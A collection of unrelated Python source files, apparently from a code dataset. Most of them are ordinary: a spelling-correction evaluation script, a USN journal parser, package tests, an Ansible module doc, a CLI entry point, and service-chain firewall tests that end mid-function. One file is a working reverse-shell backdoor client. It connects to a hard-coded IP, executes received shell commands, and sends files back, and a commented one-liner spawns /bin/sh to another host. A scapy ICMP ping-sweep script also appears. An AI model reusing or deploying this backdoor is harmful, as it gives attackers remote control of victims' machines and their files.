self.turretThreshold.setCalibrating(False)
if not self.turretThreshold.calibrated:
self.turretThreshold.setTurretspeed(0)
self.turretThreshold.setDeadzones(self.limitL, self.limitR)
self.limitTable.putNumber("Left Limit", self.limitL)
self.limitTable.putNumber("Right Limit", self.limitR)
self.done()
| StarcoderdataPython |
3361987 | <gh_stars>0
#referred https://github.com/mammothb/symspellpy
import os
from collections import Counter
from symspellpy.symspellpy import SymSpell, Verbosity # import the module
import pickle as pkl
def read_qspell():
file='../corpus-webis-qspell-17.csv'
data=[]
valid=[]
lens=[]
with open(file) as f:
for line in f:
part=line.strip().rstrip(';').split(';')
data.append(part[1])
valid.append(part[2:])
lens.append(len(valid[-1]))
# if lens[-1]>1:
# print(part)
print(file, len(data),Counter(lens))
return data,valid
def read_jdb():
train_file='../v1.0/train.txt'
test_file_1='../v1.0/test-split1.txt'
test_file_2='../v1.0/test-split2.txt'
test_file_3='../v1.0/test-split3.txt'
train_data,train_pred=read_jdb_input_file(train_file)
test_data,test_pred=read_jdb_input_file(test_file_1)
test_data2,test_pred2=read_jdb_input_file(test_file_2)
test_data.extend(test_data2)
test_pred.extend(test_pred2)
test_data3,test_pred3=read_jdb_input_file(test_file_3)
test_data.extend(test_data3)
test_pred.extend(test_pred3)
print("Train:",len(train_data))
print("Test:",len(test_data))
return train_data,train_pred,test_data,test_pred
def read_jdb_input_file(file):
data=[]
valid=[]
lens=[]
# with open('../../v1.0/train.txt') as f:
with open(file) as f:
for line in f:
part=line.strip().split('\t')
data.append(part[0])
valid.append(part[1:])
lens.append(len(valid[-1]))
# if lens[-1]>1:
# print(valid[-1])
print(file, len(data),Counter(lens))
return data,valid
def read_end2end(flag=0):
file='./end_to_end_queries.tsv'
data=[]
valid=[]
lens=[]
single_file='./end_queries.txt'
s_file=open(single_file,'w')
with open(file) as f:
for line in f:
part=line.strip().split('\t')
data.append(part[0])
valid.append(part[1:])
lens.append(len(valid[-1]))
# if lens[-1]>1:
# print(valid[-1])
if flag==1:
s_file.write(part[0])
s_file.write('\n')
print(file, len(data),Counter(lens))
return data,valid
def read_trec_input():
file='./data.txt'
data=[]
valid=[]
lens=[]
with open(file) as f:
for line in f:
part=line.strip().split('\t')
data.append(part[0])
valid.append(part[1:])
lens.append(len(valid[-1]))
# if lens[-1]>1:
# print(valid[-1])
print(file, len(data),Counter(lens))
return data,valid
def run_eval(data,prediction,valid):
num_data=len(prediction)
total=0.1
acc=0.1
# print('in eval')
for i in range(len(prediction)):
# x=input()
if data[i] not in valid[i]:
print(data[i],'\t',prediction[i],'\t',valid[i])
# print('The data x is not in the prediction')
total+=1
if prediction[i] in valid[i]:
# print('right')
acc+=1
print(total, ' out of ', len(prediction),' not in the input')
print(acc, ' out of ', total,' correct\n')
in_input=num_data-total+0.1
mod_acc=(acc+in_input)/num_data
return acc/total, mod_acc, in_input/num_data
def run_symsp(data,file,Y):
# create object
initial_capacity = 83000
# maximum edit distance per dictionary precalculation
max_edit_distance_dictionary = 2
prefix_length = 7
sym_spell = SymSpell(initial_capacity, max_edit_distance_dictionary,
prefix_length)
# load dictionary
dictionary_path = os.path.join(os.path.dirname(__file__),
"frequency_dictionary_en_82_765.txt")
term_index = 0 # column of the term in the dictionary text file
count_index = 1 # column of the term frequency in the dictionary text file
if not sym_spell.load_dictionary(dictionary_path, term_index, count_index):
print("Dictionary file not found")
return
# # lookup suggestions for single-word input strings
# input_term = "memebers" # misspelling of "members"
# # max edit distance per lookup
# # (max_edit_distance_lookup <= max_edit_distance_dictionary)
# max_edit_distance_lookup = 2
# suggestion_verbosity = Verbosity.CLOSEST # TOP, CLOSEST, ALL
# suggestions = sym_spell.lookup(input_term, suggestion_verbosity,
# max_edit_distance_lookup)
# # display suggestion term, term frequency, and edit distance
# for suggestion in suggestions:
# print("{}, {}, {}".format(suggestion.term, suggestion.count,
# suggestion.distance))
# # lookup suggestions for multi-word input strings (supports compound
# # splitting & merging)
# input_term = ("whereis th elove hehad dated forImuch of thepast who "
# "couqdn'tread in sixtgrade and ins pired him")
# # max edit distance per lookup (per single word, not per whole input string)
max_edit_distance_lookup = 2
f_wrong=open('wrong'+file[2:],'w')
f=open(file,'w')
pred=[]
for i,input_term in enumerate(data):
suggestions = sym_spell.lookup_compound(input_term,
max_edit_distance_lookup)
# display suggestion term, edit distance, and term frequency
for suggestion in suggestions:
# print("{}, {}, {}".format(suggestion.term, suggestion.count,
# suggestion.distance))
# op=[suggestion.term, suggestion.count,
# suggestion.distance]
pred.append(suggestion.term)
f.write(suggestion.term)
# f.write(str(suggestion.count)+'\t')
# f.write(str(suggestion.distance))
f.write('\n')
if suggestion.term not in Y[i]:
# print('Input term:',input_term)
# print('Candidates: ',Y[i])
# print('Suggestion: ',suggestion.term)
# x=input()
f_wrong.write(input_term)
f_wrong.write('\t')
f_wrong.write(suggestion.term)
f_wrong.write('\t')
f_wrong.write('\t'.join(Y[i]))
f_wrong.write('\n')
f.close()
return pred
def predict_all():
X,Y,test_x,test_y=read_jdb()
test_x_pred=run_symsp(test_x,'./jdb_op_test.txt',test_y)
with open('./jdb_test.pkl', 'wb') as handle:
pkl.dump(test_x_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
X_pred=run_symsp(X,'./jdb_op_train.txt',Y)
with open('./jdb.pkl', 'wb') as handle:
pkl.dump(X_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
X.extend(test_x)
Y.extend(test_y)
X_pred=run_symsp(X,'./jdb_op_all.txt',Y)
with open('./jdb_all.pkl', 'wb') as handle:
pkl.dump(X_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
X,Y=read_trec_input()
X_pred=run_symsp(X,'./op.txt',Y)
with open('./trec.pkl', 'wb') as handle:
pkl.dump(X_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
X,Y=read_qspell()
X_pred=run_symsp(X,'./qspell_op.txt',Y)
with open('./qspell.pkl', 'wb') as handle:
pkl.dump(X_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
X,Y=read_end2end()
X_pred=run_symsp(X,'./end_op.txt',Y)
with open('./end.pkl', 'wb') as handle:
pkl.dump(X_pred, handle, protocol=pkl.HIGHEST_PROTOCOL)
def eval_all():
X,Y,test_x,test_y=read_jdb()
print('Base: ',run_eval(X,X,Y))
with open('./jdb_all.pkl', 'rb') as handle:
pred_load=pkl.load(handle)
X.extend(test_x)
Y.extend(test_y)
print('Method X : ',run_eval(X,pred_load,Y))
with open('./jdb.pkl', 'rb') as handle:
pred_load=pkl.load(handle)
print('Method X : ',run_eval(X,pred_load,Y))
with open('./jdb_test.pkl', 'rb') as handle:
pred_test_load=pkl.load(handle)
print('Method,test: ',run_eval(test_x,pred_test_load,test_y))
X,Y=read_trec_input()
with open('./trec.pkl', 'rb') as handle:
pred_trec_load=pkl.load(handle)
# print('Base: ',run_eval(X,X,Y))
print('Method X: ',run_eval(X,pred_trec_load,Y))
X,Y=read_qspell()
with open('./qspell.pkl', 'rb') as handle:
pred_qspell_load=pkl.load(handle)
# print('Base: ',run_eval(X,X,Y))
print('Method X: ',run_eval(X,pred_qspell_load,Y))
X,Y=read_end2end()
with open('./end.pkl', 'rb') as handle:
pred_qspell_load=pkl.load(handle)
# print('Base: ',run_eval(X,X,Y))
print('Method X: ',run_eval(X,pred_qspell_load,Y))
# def main():
predict_all()
eval_all()
# if __name__ == "__main__":
# main()
# def read_dict(file):#reading birbeck dictionary of misspelled words
# # file='./missp/missp.dat'
# dict_word={}
# with open(file,'r') as f:
# for line in f:
# word=line.strip()
# if '$' in word:
# key=word[1:]
# else:
# if word not in dict_word:
# dict_word[word]=key
# return dict_word
# def read_dict_h(file):#reading birbeck dictionary of misspelled words
# dict_word={}
# with open(file,'r') as f:
# for line in f:
# word=line.strip()
# print(word)
# if '$' in word:
# key=word[1:]
# else:
# if word not in dict_word:
# dict_word[word]=key
# return dict_word
# def run_dictmethod(X):
# pred=[]
# for query in X:
# modified_query=[]
# for word in query.split():
# if word in birbeck:
# modified_query.append(birbeck[word])
# else:
# modified_query.append(word)
# pred.append(' '.join(modified_query))
# return pred
# def read_all_dict():
# birbeck=read_dict('./missp/missp.dat')
# # birbeck=read_dict('./missp/missp.dat')
# aspell=read_dict('./missp/aspell.dat')
# # print(aspell)
# wiki=read_dict('./missp/wikipedia.dat')
# # print(wiki)
# holbrook=read_dict_h('./missp/holbrook-missp.dat')
# birbeck.update(aspell)
# birbeck.update(wiki)
# print(birbeck)
# print(len(birbeck))
# return birbeck
# def dict_method():
# X,Y,test_x,test_y=read_jdb()
# pred=run_dictmethod(X)
# acc=run_eval(X,pred,Y)
# print('Acc:',acc)
# X.extend(test_x)
# Y.extend(test_y)
# pred=run_dictmethod(X)
# acc=run_eval(X,pred,Y)
# print('Acc:',acc)
# X,Y=read_trec_input()
# pred=run_dictmethod(X)
# acc=run_eval(X,pred,Y)
# print('Acc:',acc)
# X,Y=read_qspell()
# pred=run_dictmethod(X)
# acc=run_eval(X,pred,Y)
# print('Acc:',acc)
# dict_method()
# birbeck=read_all_dict()
# dict_method()
| StarcoderdataPython |
67762 | # -*- coding: utf-8 -*-
"""USN change journal records."""
import os
from dtformats import data_format
class USNRecords(data_format.BinaryDataFile):
"""USN change journal records."""
# Using a class constant significantly speeds up the time required to load
# the dtFabric definition file.
_FABRIC = data_format.BinaryDataFile.ReadDefinitionFile('usn_journal.yaml')
_DEBUG_INFO_RECORD_V2 = [
('size', 'Size', '_FormatIntegerAsDecimal'),
('major_version', 'Major version', '_FormatIntegerAsDecimal'),
('minor_version', 'Manor version', '_FormatIntegerAsDecimal'),
('file_reference', 'File reference', '_FormatIntegerAsHexadecimal8'),
('parent_file_reference', 'Parent file reference',
'_FormatIntegerAsHexadecimal8'),
('timestamp', 'Timestamp', '_FormatIntegerAsFiletime'),
('update_reason_flags', 'Update reason flags',
'_FormatIntegerAsHexadecimal8'),
('update_source_flags', 'Update source flags',
'_FormatIntegerAsHexadecimal8'),
('security_descriptor_entry', 'Security descriptor entry',
'_FormatIntegerAsDecimal'),
('file_attribute_flags', 'File attribute flags',
'_FormatIntegerAsHexadecimal8'),
('name_size', 'Name size', '_FormatIntegerAsDecimal'),
('name_offset', 'Name offset', '_FormatIntegerAsDecimal'),
('name', 'Name', '_FormatString')]
_EMPTY_USN_RECORD_HEADER = bytes([0] * 60)
def _ReadRecordV2(self, file_object):
"""Reads a version 2 USN record.
Args:
file_object (file): file-like object.
Returns:
tuple[usn_record_v2, int]: USN record and number of bytes read.
Raises:
ParseError: if the record cannot be read.
"""
file_offset = file_object.tell()
data_type_map = self._GetDataTypeMap('usn_record_v2')
usn_record, data_size = self._ReadStructureFromFileObject(
file_object, file_offset, data_type_map, 'USN record (version 2)')
if self._debug:
self._DebugPrintStructureObject(usn_record, self._DEBUG_INFO_RECORD_V2)
return usn_record, data_size
def ReadFileObject(self, file_object):
"""Reads a file-like object containing USN change journal records.
Args:
file_object (file): file-like object.
Raises:
ParseError: if the file cannot be read.
"""
self._file_object = file_object
def ReadRecords(self):
"""Reads USN change journal records.
Yields:
usn_record_v2: USN record.
Raises:
ParseError: if a record cannot be read.
"""
self._file_object.seek(0, os.SEEK_SET)
file_offset = 0
while file_offset < self._file_size:
block_size = 4096
if block_size > self._file_size:
block_size = self._file_size
while block_size > 60:
usn_record_header = self._file_object.read(60)
if usn_record_header == self._EMPTY_USN_RECORD_HEADER:
break
self._file_object.seek(-60, os.SEEK_CUR)
usn_record, data_size = self._ReadRecordV2(self._file_object)
yield usn_record
file_offset += data_size
block_size -= data_size
file_offset += block_size
| StarcoderdataPython |
3228885 | <gh_stars>0
import os
import os.path
import pyndows
from pyndows.testing import samba_mock, SMBConnectionMock
class DateTimeMock:
@staticmethod
def utcnow():
class UTCDateTimeMock:
@staticmethod
def isoformat():
return "2018-10-11T15:05:05.663979"
return UTCDateTimeMock
def test_pass_health_check(samba_mock: SMBConnectionMock, monkeypatch):
monkeypatch.setattr(pyndows._windows, "datetime", DateTimeMock)
connection = pyndows.connect(
"TestComputer", "127.0.0.1", 80, "TestDomain", "TestUser", "TestPassword"
)
samba_mock.echo_responses[b""] = b""
assert pyndows.check("tests", connection) == (
"pass",
{
"tests:echo": {
"componentType": "TestComputer",
"observedValue": "",
"status": "pass",
"time": "2018-10-11T15:05:05.663979",
}
},
)
def test_fail_health_check(samba_mock: SMBConnectionMock, monkeypatch):
monkeypatch.setattr(pyndows._windows, "datetime", DateTimeMock)
connection = pyndows.connect(
"TestComputer", "127.0.0.1", 80, "TestDomain", "TestUser", "TestPassword"
)
assert pyndows.check("tests", connection) == (
"fail",
{
"tests:echo": {
"componentType": "TestComputer",
"status": "fail",
"time": "2018-10-11T15:05:05.663979",
"output": f"Mock for echo failure.{os.linesep}",
}
},
)
| StarcoderdataPython |
1622704 | <reponame>cyphyhouse/KoordLanguage
from src.harness.agentThread import AgentThread
class Task:
def __init__(self):
self.loc = None
self.assignId = None
self.taskId = None
class DefaultName(AgentThread):
def __init__(self, config, motion_config):
super(DefaultName, self).__init__(config, motion_config)
def initialize_vars(self):
self.locals = {}
self.locals['i'] = 0
self.locals['currentRoute'] = None
self.locals['newTask'] = None
self.locals['asgn'] = 0
self.locals['rchd'] = 1
self.locals['cmplt'] = 2
self.locals['stage'] = 0
self.create_aw_var('taskList', list, None)
self.create_ar_var('routes', list, None)
def loop_body(self):
if self.locals['stage'] == self.locals['asgn']:
self.locals['newTask'] = self.getAvailableNextTask(self.read_from_shared('taskList', None))
self.locals['currentRoute'] = self.getPathFromTask(self.locals['newTask'])
if not self.willCollide(self.locals['newTask']):
self.write_to_shared('routes', self.pid(), self.locals['currentRoute'])
self.write_to_actuator('Motion.route', self.locals['currentRoute'])
self.locals['stage'] = self.locals['rchd']
return
if self.locals['stage'] == self.locals['rchd'] and self.read_from_sensor('Motion.done'):
self.locals['stage'] = self.locals['asgn']
return
| StarcoderdataPython |
1658511 | """
Migration script to add the post_job_action_association table.
"""
import logging
from sqlalchemy import (
Column,
ForeignKey,
Integer,
MetaData,
Table,
)
from galaxy.model.migrate.versions.util import (
create_table,
drop_table,
)
log = logging.getLogger(__name__)
metadata = MetaData()
PostJobActionAssociation_table = Table(
"post_job_action_association",
metadata,
Column("id", Integer, primary_key=True),
Column("post_job_action_id", Integer, ForeignKey("post_job_action.id"), index=True, nullable=False),
Column("job_id", Integer, ForeignKey("job.id"), index=True, nullable=False),
)
def upgrade(migrate_engine):
print(__doc__)
metadata.bind = migrate_engine
metadata.reflect()
create_table(PostJobActionAssociation_table)
def downgrade(migrate_engine):
metadata.bind = migrate_engine
metadata.reflect()
drop_table(PostJobActionAssociation_table)
| StarcoderdataPython |
1743577 | <reponame>cys3c/viper-shell
#!/usr/bin/python
#import commands
#import shutil
import socket
import subprocess
import os
import platform
import sys
# In the transfer function, we first check if the file exists in the first place, if not we will notify the attacker
# otherwise, we will create a loop where each time we iterate we will read 1 KB of the file and send it, since the
# server has no idea about the end of the file we add a tag called 'DONE' to address this issue, finally we close the file
def transfer(s,path):
if os.path.exists(path):
f = open(path, 'rb')
packet = f.read(1024)
while packet != '':
s.send(packet)
packet = f.read(1024)
s.send('DONE')
f.close()
else: # the file doesn't exist
s.send('Unable to find out the file')
def recieve(s):
print('We are receiving a file')
f = open('C:\\Temp\\test.txt', 'wb')
while True:
bits = s.recv(1024)
print(bits)
if 'File does not exist' in bits:
print('File does not exist')
break
elif bits.endswith('DONE'):
print('[+] Tansfer Complete ')
f.close()
break
else:
f.write(bits)
print('[+] Tansfer Complete ')
f.close()
break
def connect():
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.50",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.11.0.202', 8081))
while True:
command = s.recv(1024)
if 'terminate' in command:
sock.send("Connection is shutting down ..................\n\n")
s.close()
break
# if we received grab keyword from the attacker, then this is an indicator for
# file transfer operation, hence we will split the received commands into two
# parts, the second part which we interested in contains the file path, so we will
# store it into a variable called path and pass it to transfer function
# Remember the Formula is grab*<File Path>
# Example: grab*C:\Users\Ghost\Desktop\photo.jpeg
elif 'grab' in command:
grab,path = command.split('*')
try: # when it comes to low level file transfer, allot of things can go wrong, therefore
# we use exception handling (try and except) to protect our script from being crashed
# in case something went wrong, we will send the error that happened and pass the exception
transfer(s,path)
except Exception,e:
s.send ( str(e) ) # send the exception error
pass
#elif 'cd' in command:# the forumal here is gonna be cd then space then the path that we want to go to, like cd C:\Users
# code,directory = command.split(" ") # split up the received command based on space into two variables
# os.chdir(directory) # changing the directory
# # we send back a string mentioning the new CWD Note, os.getcwd should stop it from hanging
#s.send( "[+] CWD Is " + os.getcwd() )
elif 'cd' in command:
for x in command:
if 'cd*' in x:
code, command = command.split("*")
os.chdir(command)
s.send ("[+] CWD Is " + os.getcwd())
elif 'cd' in command:
code, command = command.split(" ")
os.chdir(command)
s.send ("[+] CWD Is " + os.getcwd())
elif 'getenv' in command:
s.send( "[+] Platform Is " + platform.platform())
elif 'getuid' in command:
s.send( "[+] UserID Is " + os.environ.get('USERNAME'))
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send( CMD.stdout.read() )
s.send( CMD.stderr.read() )
def main ():
connect()
main()
| StarcoderdataPython |
3226972 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Ansible Project
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: package
version_added: 2.0
author:
- Ansible Inc
short_description: Generic OS package manager
description:
- Installs, upgrade and removes packages using the underlying OS package manager.
- For Windows targets, use the M(win_package) module instead.
options:
name:
description:
- "Package name, or package specifier with version, like C(name-1.0)."
- "Be aware that packages are not always named the same and this module will not 'translate' them per distro."
required: true
state:
description:
- Whether to install (C(present), or remove (C(absent)) a package. Other states depend on the underlying package module, i.e C(latest).
required: true
use:
description:
- The required package manager module to use (yum, apt, etc). The default 'auto' will use existing facts or try to autodetect it.
- You should only use this field if the automatic selection is not working for some reason.
required: false
default: auto
requirements:
- Whatever is required for the package plugins specific for each system.
notes:
- This module actually calls the pertinent package modules for each system (apt, yum, etc).
- For Windows targets, use the M(win_package) module instead.
'''
EXAMPLES = '''
- name: install ntpdate
package:
name: ntpdate
state: present
# This uses a variable as this changes per distribution.
- name: remove the apache package
package:
name: "{{ apache }}"
state: absent
'''
| StarcoderdataPython |
1705684 | #------------------------------------------------------------------------------#
# Copyright 2018 <NAME>. All rights reserved. Use of this source #
# code is governed by a MIT license that can be found in the LICENSE file. #
#------------------------------------------------------------------------------#
"""
betrack
Usage:
betrack -h | --help
betrack --version
betrack track-particles -c <file> | --configuration=<file>
betrack annotate-video
Options:
-h --help Show help screen.
--version Show betrack version.
-c <file> --configuration=<file> Specify a yml configuration file.
Examples:
betrack track-particles
Help:
For help using this tool, please open an issue on the Github repository:
https://github.com/gvalentini85/betrack-cli/issues
"""
from sys import exit
from inspect import getmembers, isclass
from docopt import docopt
from . import __cli__ as CLI
from . import __version__ as VERSION
def main():
"""Main CLI entrypoint."""
import betrack.commands
options = docopt(__doc__, version=CLI + ' ' + VERSION)
for (k, v) in options.items():
if hasattr(betrack.commands, k.replace('-', '')) and v:
module = getattr(betrack.commands, k.replace('-', ''))
betrack.commands = getmembers(module, isclass)
command = [command[1] for command in betrack.commands if command[0] != 'BetrackCommand'][0]
command = command(options)
errcode = command.run()
exit(errcode)
| StarcoderdataPython |
3276322 | <filename>tests/conftest.py
import pytest
from pytest_factoryboy import register
from wagtail.core.models import Site
from .factories import BlogPageFactory
register(BlogPageFactory)
@pytest.fixture
def home():
# Root page is created by Wagtail migrations.
return Site.objects.first().root_page
| StarcoderdataPython |
3318665 | <reponame>APrioriInvestments/typed_python
# Copyright 2017-2019 typed_python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typed_python.compiler.type_wrappers.wrapper import Wrapper
from typed_python import _types
import typed_python.compiler
typeWrapper = lambda x: typed_python.compiler.python_object_representation.typedPythonTypeToTypeWrapper(x)
class BoundMethodWrapper(Wrapper):
def __init__(self, t):
super().__init__(t)
self.firstArgType = typeWrapper(self.typeRepresentation.FirstArgType)
@staticmethod
def Make(wrapperType, attr):
return BoundMethodWrapper(_types.BoundMethod(wrapperType.typeRepresentation, attr))
def getNativeLayoutType(self):
return self.firstArgType.getNativeLayoutType()
def convert_assign(self, context, target, toStore):
return self.firstArgType.convert_assign(
context,
target.changeType(self.firstArgType),
toStore.changeType(self.firstArgType)
)
def convert_copy_initialize(self, context, target, toStore):
return self.firstArgType.convert_copy_initialize(
context,
target.changeType(self.firstArgType),
toStore.changeType(self.firstArgType)
)
def convert_destroy(self, context, instance):
return self.firstArgType.convert_destroy(
context,
instance.changeType(self.firstArgType)
)
def convert_call(self, context, left, args, kwargs):
return self.firstArgType.convert_method_call(
context,
left.changeType(self.firstArgType),
self.typeRepresentation.FuncName,
args,
kwargs
)
def convert_to_type_with_target(self, context, instance, targetVal, conversionLevel, mayThrowOnFailure=False):
if targetVal.expr_type.typeRepresentation is bool:
targetVal.convert_copy_initialize(context.constant(True))
return context.constant(True)
return super().convert_to_type_with_target(context, instance, targetVal, conversionLevel, mayThrowOnFailure)
| StarcoderdataPython |
4835056 | <gh_stars>10-100
#!/usr/bin/python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
if len(sys.argv) != 2:
print "Usage - ./pinger.py [filename]"
print "Example - ./pinger.py iplist.txt"
print "Example will perform an ICMP ping scan of the IP addresses listed in iplist.txt"
sys.exit()
filename = str(sys.argv[1])
file = open(filename,'r')
for addr in file:
ans=sr1(IP(dst=addr.strip())/ICMP(),timeout=1,verbose=0)
if ans == None:
pass
else:
print addr.strip() | StarcoderdataPython |
1799043 | from datetime import datetime
from capslock import run_multiple_times
@run_multiple_times(times=10)
def current_time():
now = datetime.now()
return now.strftime("%H:%M:%S.%f")
if __name__ == '__main__':
print(current_time()) | StarcoderdataPython |
158813 | from time import sleep
from common.servicechain.config import ConfigSvcChain
from common.servicechain.verify import VerifySvcChain
from common.servicechain.mirror.verify import VerifySvcMirror
from common.servicechain.mirror.config import ConfigSvcMirror
from tcutils.util import get_random_cidr
from tcutils.util import get_random_name
from common.ecmp.ecmp_traffic import ECMPTraffic
from common.ecmp.ecmp_verify import ECMPVerify
class VerifySvcFirewall(VerifySvcMirror):
def verify_svc_span(self, in_net=False):
vn1_name = get_random_name("left_vn")
vn1_subnets = ['192.168.3.11/24']
vm1_name = get_random_name('left_vm')
vn2_name = get_random_name("right_vn")
vn2_subnets = ['172.16.17.32/24']
vm2_name = get_random_name('right_vm')
if in_net:
vn1_name = get_random_name("in_left_vn")
vn1_subnets = ['172.16.58.3/24']
vm1_name = get_random_name('in_left_vm')
vn2_name = get_random_name("in_right_vn")
vn2_subnets = ['172.16.17.32/24']
vm2_name = get_random_name('in_right_vm')
vn1_fixture = self.config_vn(vn1_name, vn1_subnets)
vn2_fixture = self.config_vn(vn2_name, vn2_subnets)
vm1_fixture = self.config_vm(vn1_fixture, vm1_name)
vm2_fixture = self.config_vm(vn2_fixture, vm2_name)
assert vm1_fixture.verify_on_setup()
assert vm2_fixture.verify_on_setup()
vm1_fixture.wait_till_vm_is_up()
vm2_fixture.wait_till_vm_is_up()
si_count = 3
st_name = get_random_name("tcp_svc_template")
si_prefix = "tcp_bridge_"
policy_name = get_random_name("allow_tcp")
if in_net:
st_name = get_random_name("in_tcp_svc_template")
si_prefix = "in_tcp_bridge_"
policy_name = get_random_name("in_allow_tcp")
tcp_st_fixture, tcp_si_fixtures = self.config_st_si(
st_name, si_prefix, si_count,
left_vn=vn1_name, right_vn=vn2_name)
else:
tcp_st_fixture, tcp_si_fixtures = self.config_st_si(
st_name, si_prefix, si_count)
action_list = self.chain_si(si_count, si_prefix)
# Update rule with specific port/protocol
rule = [{'direction': '<>',
'protocol': 'tcp',
'source_network': vn1_name,
'src_ports': [8000, 8000],
'dest_network': vn2_name,
'dst_ports': [9000, 9000],
'simple_action': None,
'action_list': {'apply_service': action_list}
}]
# Create new policy with rule to allow traffci from new VN's
tcp_policy_fixture = self.config_policy(policy_name, rule)
self.verify_si(tcp_si_fixtures)
st_name = get_random_name("udp_svc_template")
si_prefix = "udp_bridge_"
policy_name = get_random_name("allow_udp")
if in_net:
st_name = get_random_name("in_udp_svc_template")
si_prefix = "in_udp_bridge_"
policy_name = get_random_name("in_allow_udp")
udp_st_fixture, udp_si_fixtures = self.config_st_si(
st_name, si_prefix, si_count,
left_vn=vn1_name, right_vn=vn2_name)
else:
udp_st_fixture, udp_si_fixtures = self.config_st_si(
st_name, si_prefix, si_count)
action_list = self.chain_si(si_count, si_prefix)
# Update rule with specific port/protocol
rule = [{'direction': '<>',
'protocol': 'udp',
'source_network': vn1_name,
'src_ports': [8001, 8001],
'dest_network': vn2_name,
'dst_ports': [9001, 9001],
'simple_action': None,
'action_list': {'apply_service': action_list}
}]
# Create new policy with rule to allow traffci from new VN's
udp_policy_fixture = self.config_policy(policy_name, rule)
vn1_udp_policy_fix = self.attach_policy_to_vn(
[tcp_policy_fixture, udp_policy_fixture], vn1_fixture)
vn2_udp_policy_fix = self.attach_policy_to_vn(
[tcp_policy_fixture, udp_policy_fixture], vn2_fixture)
result, msg = self.validate_vn(vn1_name)
assert result, msg
result, msg = self.validate_vn(vn2_name)
assert result, msg
self.verify_si(udp_si_fixtures)
# Install traffic package in VM
vm1_fixture.install_pkg("Traffic")
vm2_fixture.install_pkg("Traffic")
sport = 8001
dport = 9001
sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
sport = 8000
dport = 9000
sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
'tcp', sport=sport, dport=dport)
errmsg = "TCP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
self.delete_si_st(tcp_si_fixtures, tcp_st_fixture)
sport = 8001
dport = 9001
sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
sport = 8000
dport = 9000
sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
'tcp', sport=sport, dport=dport)
errmsg = "TCP traffic with src port %s and dst port %s passed; Expected to fail" % (
sport, dport)
assert sent and recv == 0, errmsg
st_name = get_random_name("tcp_svc_template")
si_prefix = "tcp_bridge_"
policy_name = get_random_name("allow_tcp")
if in_net:
st_name = get_random_name("in_tcp_svc_template")
si_prefix = "in_tcp_bridge_"
policy_name = get_random_name("in_allow_tcp")
tcp_st_fixture, tcp_si_fixtures = self.config_st_si(
st_name, si_prefix, si_count,
left_vn=vn1_name, right_vn=vn2_name)
else:
tcp_st_fixture, tcp_si_fixtures = self.config_st_si(
st_name, si_prefix, si_count)
action_list = self.chain_si(si_count, si_prefix)
result, msg = self.validate_vn(vn1_name)
assert result, msg
result, msg = self.validate_vn(vn2_name)
assert result, msg
self.verify_si(tcp_si_fixtures)
sport = 8001
dport = 9001
sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
sport = 8000
dport = 9000
sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
'tcp', sport=sport, dport=dport)
errmsg = "TCP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
def verify_svc_transparent_datapath(
self, si_count=1, svc_scaling=False, max_inst=1,
svc_mode='transparent',
flavor=None, proto='any', src_ports=[0, -1],
dst_ports=[0, -1], svc_img_name=None, ci=False, st_version=1):
"""Validate the service chaining datapath"""
self.mgmt_vn_name = get_random_name("mgmt_vn")
self.mgmt_vn_subnets = [get_random_cidr(af=self.inputs.get_af())]
self.mgmt_vn_fixture = self.config_vn(
self.mgmt_vn_name, self.mgmt_vn_subnets)
self.vn1_name = get_random_name('bridge_vn1')
self.vn1_subnets = [get_random_cidr(af=self.inputs.get_af())]
self.vm1_name = get_random_name('bridge_vm1')
self.vn2_name = get_random_name('bridge_vn2')
self.vn2_subnets = [get_random_cidr(af=self.inputs.get_af())]
self.vm2_name = get_random_name('bridge_vm2')
self.action_list = []
self.if_list = []
self.st_name = get_random_name('service_template_1')
si_prefix = get_random_name('bridge_si') + '_'
self.policy_name = get_random_name('policy_transparent')
self.vn1_fixture = self.config_vn(self.vn1_name, self.vn1_subnets)
self.vn2_fixture = self.config_vn(self.vn2_name, self.vn2_subnets)
if st_version == 1:
(mgmt_vn, left_vn, right_vn) = (None, None, None)
else:
(mgmt_vn, left_vn, right_vn) = (self.mgmt_vn_fixture.vn_fq_name,
self.vn1_fixture.vn_fq_name, self.vn2_fixture.vn_fq_name)
self.st_fixture, self.si_fixtures = self.config_st_si(
